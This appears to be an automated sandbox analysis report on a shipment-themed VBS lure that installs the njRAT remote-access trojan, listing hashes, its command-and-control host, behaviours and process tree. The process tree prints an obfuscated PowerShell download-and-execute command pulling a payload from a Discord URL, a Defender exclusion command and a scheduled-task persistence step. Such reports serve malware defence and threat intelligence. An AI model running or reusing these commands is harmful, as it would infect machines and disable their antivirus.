Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
29-10-2021 18:41
Static task
static1
Behavioral task
behavioral1
Sample
Shipment#45523666245.vbs
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
Shipment#45523666245.vbs
Resource
win10-en-20210920
General
-
Target
Shipment#45523666245.vbs
-
Size
15KB
-
MD5
b671f9ee1edb1e6f2911c22c4e6ebbaf
-
SHA1
6de6dfee5b87a8f52ce34bc0c9d147bc69faa04e
-
SHA256
313bb9d87b5bbdc4cc164ee429b41bcac1605401e1c3e7fa8d1fa287277e3cce
-
SHA512
15f4ed29c203cf9a2da50b5df6d898e79feb08cf9ddc0ab7c315eeab9038745743e5352dc2db5197c3bf3817d26590bf4adc21a91a68fd2dcd633e3712fa4832
Malware Config
Extracted
njrat
v2.0
------(MEILLLER)------
new.libya2020.com.ly:2020
Windows
-
reg_key
Windows
-
splitter
|-F-|
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 5 1352 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
update.exeupdate.exepid process 1796 update.exe 1736 update.exe -
Drops startup file 1 IoCs
Processes:
update.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk update.exe -
Loads dropped DLL 1 IoCs
Processes:
update.exepid process 1796 update.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
update.exedescription pid process target process PID 1796 set thread context of 1736 1796 update.exe update.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 1352 powershell.exe 1352 powershell.exe 1352 powershell.exe 988 powershell.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
Processes:
powershell.exepowershell.exeupdate.exedescription pid process Token: SeDebugPrivilege 1352 powershell.exe Token: SeDebugPrivilege 988 powershell.exe Token: SeDebugPrivilege 1736 update.exe Token: 33 1736 update.exe Token: SeIncBasePriorityPrivilege 1736 update.exe Token: 33 1736 update.exe Token: SeIncBasePriorityPrivilege 1736 update.exe Token: 33 1736 update.exe Token: SeIncBasePriorityPrivilege 1736 update.exe Token: 33 1736 update.exe Token: SeIncBasePriorityPrivilege 1736 update.exe Token: 33 1736 update.exe Token: SeIncBasePriorityPrivilege 1736 update.exe Token: 33 1736 update.exe Token: SeIncBasePriorityPrivilege 1736 update.exe Token: 33 1736 update.exe Token: SeIncBasePriorityPrivilege 1736 update.exe -
Suspicious use of WriteProcessMemory 30 IoCs
Processes:
WScript.exepowershell.exeupdate.exedescription pid process target process PID 1032 wrote to memory of 1352 1032 WScript.exe powershell.exe PID 1032 wrote to memory of 1352 1032 WScript.exe powershell.exe PID 1032 wrote to memory of 1352 1032 WScript.exe powershell.exe PID 1352 wrote to memory of 1796 1352 powershell.exe update.exe PID 1352 wrote to memory of 1796 1352 powershell.exe update.exe PID 1352 wrote to memory of 1796 1352 powershell.exe update.exe PID 1352 wrote to memory of 1796 1352 powershell.exe update.exe PID 1352 wrote to memory of 1796 1352 powershell.exe update.exe PID 1352 wrote to memory of 1796 1352 powershell.exe update.exe PID 1352 wrote to memory of 1796 1352 powershell.exe update.exe PID 1796 wrote to memory of 988 1796 update.exe powershell.exe PID 1796 wrote to memory of 988 1796 update.exe powershell.exe PID 1796 wrote to memory of 988 1796 update.exe powershell.exe PID 1796 wrote to memory of 988 1796 update.exe powershell.exe PID 1796 wrote to memory of 1868 1796 update.exe schtasks.exe PID 1796 wrote to memory of 1868 1796 update.exe schtasks.exe PID 1796 wrote to memory of 1868 1796 update.exe schtasks.exe PID 1796 wrote to memory of 1868 1796 update.exe schtasks.exe PID 1796 wrote to memory of 1736 1796 update.exe update.exe PID 1796 wrote to memory of 1736 1796 update.exe update.exe PID 1796 wrote to memory of 1736 1796 update.exe update.exe PID 1796 wrote to memory of 1736 1796 update.exe update.exe PID 1796 wrote to memory of 1736 1796 update.exe update.exe PID 1796 wrote to memory of 1736 1796 update.exe update.exe PID 1796 wrote to memory of 1736 1796 update.exe update.exe PID 1796 wrote to memory of 1736 1796 update.exe update.exe PID 1796 wrote to memory of 1736 1796 update.exe update.exe PID 1796 wrote to memory of 1736 1796 update.exe update.exe PID 1796 wrote to memory of 1736 1796 update.exe update.exe PID 1796 wrote to memory of 1736 1796 update.exe update.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Shipment#45523666245.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $NOTHING = '(N`e`uprWjOFkvkmXBfdt`.W`e'.Replace('uprWjOFkvkmXBfd','w-Object Ne');$alosh='bCxNDFdlAckIUgChpnlo'.Replace('xNDFdlAckIUgChp','lient).Dow'); $Dont='adString(''https://cdn.discordapp.com/attachments/903219380505169933/903220062633209916/UPS.jpg'')';$YOUTUBE=I`E`X ($NOTHING,$alosh,$Dont -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1352 -
C:\Users\Public\update.exe"C:\Users\Public\update.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\update.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:988 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrAhvaHxqGKf" /XML "C:\Users\Admin\AppData\Local\Temp\tmpD73C.tmp"4⤵
- Creates scheduled task(s)
PID:1868 -
C:\Users\Public\update.exe"C:\Users\Public\update.exe"4⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
PID:1736
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
7059d3f5185128394432baaaa44ee4ea
SHA1462dbc0838cb721cfb99ce505a30b0c32237e5ba
SHA256cb12e8f994044454d20ef2effd5d91d9573f1c5b6230b87df75f51bd4921878a
SHA512d7ddd0b4c0b72581c1e52f309eaa1f48834caa27bb43ec5b0f47b9e37085244c7e250e6eb46faeee249e02b0a5bb1a2c0c05e1c9eb6ee69bd5cd9ef3e3153ff5
-
MD5
7059d3f5185128394432baaaa44ee4ea
SHA1462dbc0838cb721cfb99ce505a30b0c32237e5ba
SHA256cb12e8f994044454d20ef2effd5d91d9573f1c5b6230b87df75f51bd4921878a
SHA512d7ddd0b4c0b72581c1e52f309eaa1f48834caa27bb43ec5b0f47b9e37085244c7e250e6eb46faeee249e02b0a5bb1a2c0c05e1c9eb6ee69bd5cd9ef3e3153ff5
-
MD5
7059d3f5185128394432baaaa44ee4ea
SHA1462dbc0838cb721cfb99ce505a30b0c32237e5ba
SHA256cb12e8f994044454d20ef2effd5d91d9573f1c5b6230b87df75f51bd4921878a
SHA512d7ddd0b4c0b72581c1e52f309eaa1f48834caa27bb43ec5b0f47b9e37085244c7e250e6eb46faeee249e02b0a5bb1a2c0c05e1c9eb6ee69bd5cd9ef3e3153ff5
-
MD5
7059d3f5185128394432baaaa44ee4ea
SHA1462dbc0838cb721cfb99ce505a30b0c32237e5ba
SHA256cb12e8f994044454d20ef2effd5d91d9573f1c5b6230b87df75f51bd4921878a
SHA512d7ddd0b4c0b72581c1e52f309eaa1f48834caa27bb43ec5b0f47b9e37085244c7e250e6eb46faeee249e02b0a5bb1a2c0c05e1c9eb6ee69bd5cd9ef3e3153ff5